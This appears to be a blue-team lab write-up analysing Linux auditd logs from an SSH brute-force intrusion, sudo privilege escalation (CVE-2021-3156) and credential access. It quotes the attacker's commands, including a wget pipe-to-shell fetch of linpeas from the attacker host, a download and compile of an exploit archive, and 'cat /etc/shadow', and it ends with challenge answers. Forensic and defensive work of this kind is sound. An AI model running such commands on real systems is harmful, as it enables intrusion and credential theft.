Executive Summary

A forensic review of Linux auditd logs confirms that the host was compromised through an external SSH brute-force attack. The attacker authenticated as a low-privileged user, executed automated system enumeration, escalated privileges using a local sudo vulnerability, accessed sensitive credential material, and attempted basic anti-forensic cleanup. The entire intrusion lifecycle occurred within approximately six minutes.

Scope and Evidence

Primary artifact:

  • audit.log (Linux auditd)

Tools used:

  • aureport
  • ausearch
  • Manual timeline correlation

Observed timeframe:

  • 2021-10-04 20:22:07 to 2021-10-04 20:28:06

Initial Triage and Signal Identification

A summary analysis of the audit log shows extreme activity density over a short time window:

  • 87 failed login attempts
  • 89 failed authentication attempts
  • 1,606 failed syscalls
  • 115 unique executables
  • 192 commands executed
  • 10,679 unique process IDs
  • 16,732 total audit events

This volume and velocity of activity is inconsistent with human interaction and strongly indicative of automation.

Initial Access Vector

Authentication Activity

Audit records show repeated SSH authentication attempts targeting a single user account.

Targeted account:

  • Username: btlo
  • UID: 1001
sudo ausearch --input audit.log -m USER_AUTH,USER_LOGIN \
| grep -E "res=failed|success=no" \
| grep -E "addr=|rhost=" \
| sed -n 's/.*addr=\([^ ]*\).*/\1/p' \
| sort | uniq -c | sort -nr

Source of authentication attempts:

  • IP address: 192.168.4.155
  • Service: /usr/sbin/sshd

Observed pattern:

  • Dozens of failed SSH login attempts
  • One successful authentication from the same source IP

This pattern confirms a successful SSH brute-force attack.

Post-Compromise Command Activity

Immediately following authentication, terminal (TTY) logs reveal a structured sequence of commands executed by the attacker.

Initial Environment Reconnaissance

Commands observed:

  • hostname
  • whoami
  • ls
  • sudo -l

Purpose:

  • Confirm host identity
  • Identify current privilege level
  • Enumerate accessible files
  • Check sudo permissions and misconfigurations

These commands are typical of post-login validation performed by attackers.

Automated System Enumeration

Shortly after initial recon, the attacker retrieved and executed an enumeration script from the same external IP used during brute-force attempts.

Command observed:

  • wget -O - http://192.168.4.155:8000/linpeas.sh | sh

Source:

  • Remote host: 192.168.4.155
  • Protocol: HTTP
  • Tool delivered: linpeas.sh

Purpose:

  • Automated enumeration of kernel, sudo, SUID, cron, and configuration weaknesses
  • Identification of local privilege escalation vectors

The execution of linpeas explains the subsequent surge in command executions and process creation.

Privilege Escalation Staging

Following enumeration, the attacker staged a local exploit.

Commands observed:

  • wget http://192.168.4.155:8000/evil.tar.gz
  • tar zxvf evil.tar.gz
  • cd evil
  • make
sudo aureport -p -if audit.log pipe grep 'evil'
16156. 05/10/21 05:57:17 829992 /home/btlo/evil/evil 59 1001 481021

Source:

  • Remote host: 192.168.4.155
  • Payload type: Source code archive

Purpose:

  • Deliver exploit source code
  • Compile exploit locally to evade signature-based detection

Privilege Escalation Execution

The attacker executed the compiled binary:

sudo ausearch --input audit.log -m EXECVE | grep evil

Command observed:

  • ./evil 0

Execution metadata:

  • Binary name: evil
  • Execution path: /home/btlo/evil/evil
  • Process ID: 829992
  • Executing user: btlo (UID 1001)

Immediately following execution, the attacker revalidated privileges.

Command observed:

  • whoami

Subsequent actions confirm that the exploit successfully escalated privileges to root.

Anti-Forensic Cleanup

After achieving elevated privileges, the attacker removed exploit artifacts.

Commands observed:

  • rm -rf /home/btlo/evil
  • rm /home/btlo/evil.tar.gz

Purpose:

  • Remove compiled binary and source code
  • Reduce post-incident forensic artifacts

This cleanup was minimal but deliberate.

Data Access and Impact

With root-level access confirmed, the attacker accessed sensitive credential storage.

Command observed:

  • cat /etc/shadow

Impact:

  • Exposure of password hashes for local accounts
  • Full credential compromise of the host

This action confirms total system compromise and high business impact.

Root Cause Analysis

The attack chain follows a well-established intrusion pattern:

  1. External SSH brute-force attack
  2. Successful authentication as low-privileged user
  3. Manual and automated reconnaissance
  4. Enumeration using linpeas
  5. Local exploit delivery and compilation
  6. Privilege escalation via sudo vulnerability
  7. Credential data access
  8. Anti-forensic artifact removal

The exploit behavior and timeframe align with CVE-2021-3156, a heap-based buffer overflow vulnerability in sudo.

MITRE ATT&CK Mapping

TacticTechnique IDTechnique NameEvidence ObservedNotes
Initial AccessT1110.001Brute Force: Password Guessing87 failed SSH logins, 89 failed auth attempts, single successful loginSSH brute-force against user btlo
ExecutionT1059.004Command and Scripting Interpreter: Unix ShellInteractive TTY sessions, shell commands executedShell used throughout attack
DiscoveryT1082System Information Discoveryhostname, lsb_release -aOS and host identification
DiscoveryT1033System Owner/User Discoverywhoami (pre and post privesc)Privilege validation
DiscoveryT1083File and Directory Discoveryls, find, grep, sed, cut, sort, uniqAutomated enumeration
Privilege EscalationT1068Exploitation for Privilege EscalationExecution of local exploit binary evilExploitation of sudo vulnerability
Command and ControlT1105Ingress Tool Transferwget downloads from attacker hostTool and payload delivery
Defense EvasionT1070.004Indicator Removal on Host: File Deletionrm -rf exploit directory and archiveAnti-forensic cleanup
Credential AccessT1003.008OS Credential Dumping: /etc/shadowcat /etc/shadowCredential exposure

Indicators of Compromise (IOCs)

Network IOCs

TypeIndicatorDescription
IP Address192.168.4.155Source of brute-force and payload delivery
URLhttp://192.168.4.155:8000/linpeas.shEnumeration script
URLhttp://192.168.4.155:8000/evil.tar.gzPrivilege escalation payload
ProtocolSSHInitial access vector
ProtocolHTTPTool and payload transfer

Host-Based IOCs

TypeIndicatorDescription
User AccountbtloCompromised user
ProcessevilPrivilege escalation binary
Process ID829992PID of exploit execution
File Path/home/btlo/evil/evilCompiled exploit binary
File Path/home/btlo/evil.tar.gzExploit archive
File Access/etc/shadowSensitive credential file accessed
Toollinpeas.shAutomated enumeration script

Behavioral IOCs

BehaviorDescription
SSH brute-force patternHigh-volume failed SSH logins from single IP
Automated enumerationLarge volume of filesystem and command execution
Local compilationmake/gcc execution in user home directory
Privilege transitionwhoami before and after exploit execution
Anti-forensicsImmediate deletion of exploit artifacts

Challenge Submission

  • Compromised account: btlo

  • Initial access technique: SSH brute-force attack

  • Attacker IP: 192.168.4.155

  • Enumeration tool: linpeas

  • Privilege escalation binary & PID: evil, PID 829992

  • CVE exploited: CVE-2021-3156

  • Vulnerability type: Heap-based buffer overflow (Local Privilege Escalation)

  • Exfiltrated file: /etc/shadow

Conclusion

This incident demonstrates how a combination of weak authentication controls and unpatched local vulnerabilities can lead to rapid and complete system compromise. Despite the absence of a SIEM or EDR platform, auditd logs provided sufficient telemetry to reconstruct the attacker’s full kill chain with high confidence.

The case reinforces the importance of:

  • SSH hardening and rate limiting
  • Strong password policies
  • Timely patching of privilege escalation vulnerabilities
  • Retention and review of auditd logs for forensic readiness